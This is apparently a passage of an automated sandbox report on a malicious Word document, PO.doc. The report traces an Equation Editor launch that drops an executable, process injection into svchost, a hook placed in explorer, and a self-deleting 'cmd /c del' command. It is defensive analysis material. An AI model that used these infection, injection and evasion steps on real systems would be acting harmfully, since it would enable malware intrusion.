          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00A1C85C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00A129B2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00AB098E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00A269FE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00A95955
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00AC3A83
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00ABCBA4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00A9DBDA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00A0FBD7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00A37B00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00AAFDDD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00A40D3B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00A1CD5B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00A42E2F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00A2EE4C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00A20F3F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00A3DF7C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0009E5B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00082D8B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00082D90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0009EE3B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00089E4B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00089E50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0009EF5C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00082FB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 00A0DF5C appears 107 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 00A7F970 appears 81 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 00A53F92 appears 108 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 00A5373B appears 238 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 00A0E2A8 appears 38 times
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: String function: 00A7DF5C appears 83 times
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: String function: 00AEF970 appears 68 times
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: String function: 00AC373B appears 184 times
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: String function: 00AC3F92 appears 63 times
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_0041A350 NtCreateFile,
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_0041A400 NtReadFile,
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_0041A480 NtClose,
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_0041A530 NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_0041A34A NtCreateFile,
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_0041A3A3 NtReadFile,
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_0041A47A NtClose,
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_0041A52B NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00A700C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00A70078 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00A70048 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00A6F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00A6F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00A6FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00A6FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00A6FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00A6FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00A6FC90 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00A6FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00A6FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00A6FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00A6FEA0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00A6FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00A6FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00A710D0 NtOpenProcessToken,
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00A70060 NtQuerySection,
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00A701D4 NtSetValueKey,
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00A7010C NtOpenDirectoryObject,
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00A71148 NtOpenThread,
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00A707AC NtCreateMutant,
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00A6F8CC NtWaitForSingleObject,
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00A71930 NtSetContextThread,
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00A6F938 NtWriteFile,
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00A6FAB8 NtQueryValueKey,
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00A6FA20 NtQueryInformationFile,
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00A6FA50 NtEnumerateValueKey,
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00A6FBE8 NtQueryVirtualMemory,
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00A6FB50 NtCreateKey,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00A000C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00A007AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_009FF9F0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_009FF900 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_009FFAB8 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_009FFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_009FFAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_009FFBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_009FFB50 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_009FFB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_009FFC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_009FFD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_009FFDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_009FFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_009FFFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00A010D0 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00A00060 NtQuerySection,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00A00078 NtResumeThread,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00A00048 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00A001D4 NtSetValueKey,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00A0010C NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00A01148 NtOpenThread,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_009FF8CC NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00A01930 NtSetContextThread,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_009FF938 NtWriteFile,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_009FFA20 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_009FFA50 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_009FFBE8 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_009FFC90 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_009FFC30 NtOpenProcess,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_009FFC48 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00A00C40 NtGetContextThread,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00A01D80 NtSuspendThread,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_009FFD5C NtEnumerateKey,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_009FFEA0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_009FFE24 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_009FFFFC NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_009FFF34 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0009A350 NtCreateFile,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0009A400 NtReadFile,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0009A480 NtClose,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0009A530 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0009A34A NtCreateFile,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0009A3A3 NtReadFile,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0009A47A NtClose,
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0009A52B NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeMemory allocated: 76F90000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeMemory allocated: 76E90000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeMemory allocated: 76F90000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeMemory allocated: 76E90000 page execute and read and write
          Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: 76F90000 page execute and read and write
          Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: 76E90000 page execute and read and write
          Source: ibefrankszx[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: ibeframnk863.exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: PO.docVirustotal: Detection: 43%
          Source: PO.docReversingLabs: Detection: 28%
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\ibeframnk863.exe C:\Users\user\AppData\Roaming\ibeframnk863.exe
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeProcess created: C:\Users\user\AppData\Roaming\ibeframnk863.exe C:\Users\user\AppData\Roaming\ibeframnk863.exe
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeProcess created: C:\Users\user\AppData\Roaming\ibeframnk863.exe C:\Users\user\AppData\Roaming\ibeframnk863.exe
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe
          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Roaming\ibeframnk863.exe'
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\ibeframnk863.exe C:\Users\user\AppData\Roaming\ibeframnk863.exe
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeProcess created: C:\Users\user\AppData\Roaming\ibeframnk863.exe C:\Users\user\AppData\Roaming\ibeframnk863.exe
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeProcess created: C:\Users\user\AppData\Roaming\ibeframnk863.exe C:\Users\user\AppData\Roaming\ibeframnk863.exe
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe
          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Roaming\ibeframnk863.exe'
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$PO.docJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRE2CF.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.expl.evad.winDOC@12/8@3/3
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
          Source: explorer.exe, 00000007.00000000.433579752.0000000002AE0000.00000002.00020000.sdmpBinary or memory string: .VBPud<_
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: wntdll.pdb source: ibeframnk863.exe, svchost.exe
          Source: Binary string: svchost.pdb source: ibeframnk863.exe, 00000006.00000002.505477626.00000000006A1000.00000004.00000020.sdmp

          Data Obfuscation:

          barindex
          .NET source code contains potential unpackerShow sources
          Source: ibefrankszx[1].exe.2.dr, Castle.Samples.Extensibility/UI/ApplicationShell.cs.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: ibeframnk863.exe.2.dr, Castle.Samples.Extensibility/UI/ApplicationShell.cs.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 4.0.ibeframnk863.exe.ff0000.0.unpack, Castle.Samples.Extensibility/UI/ApplicationShell.cs.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.2.ibeframnk863.exe.ff0000.0.unpack, Castle.Samples.Extensibility/UI/ApplicationShell.cs.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.0.ibeframnk863.exe.ff0000.0.unpack, Castle.Samples.Extensibility/UI/ApplicationShell.cs.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 6.0.ibeframnk863.exe.ff0000.0.unpack, Castle.Samples.Extensibility/UI/ApplicationShell.cs.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 4_2_002E6B84 push dword ptr [ebp-17000000h]; iretd
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 4_2_002E4DE8 pushfd ; retf
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_0040E3CE push esi; iretd
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00417C03 push edi; iretd
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_0040E419 push ds; ret
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_0041D4F2 push eax; ret
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_0041D4FB push eax; ret
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00417C80 push edi; iretd
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_0041D4A5 push eax; ret
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_0041D55C push eax; ret
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00A0DFA1 push ecx; ret
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0008E3CE push esi; iretd
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0008E419 push ds; ret
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0009D4A5 push eax; ret
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0009D4FB push eax; ret
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0009D4F2 push eax; ret
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0009D55C push eax; ret
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0009D7C1 pushfd ; iretd
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00097C03 push edi; iretd
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00097C80 push edi; iretd
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0009DD5E push eax; ret
          Source: initial sampleStatic PE information: section name: .text entropy: 7.14505383023
          Source: initial sampleStatic PE information: section name: .text entropy: 7.14505383023
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\ibeframnk863.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ibefrankszx[1].exeJump to dropped file

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8C 0xCE 0xE9
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeProcess information set: NOOPENFILEERRORBOX
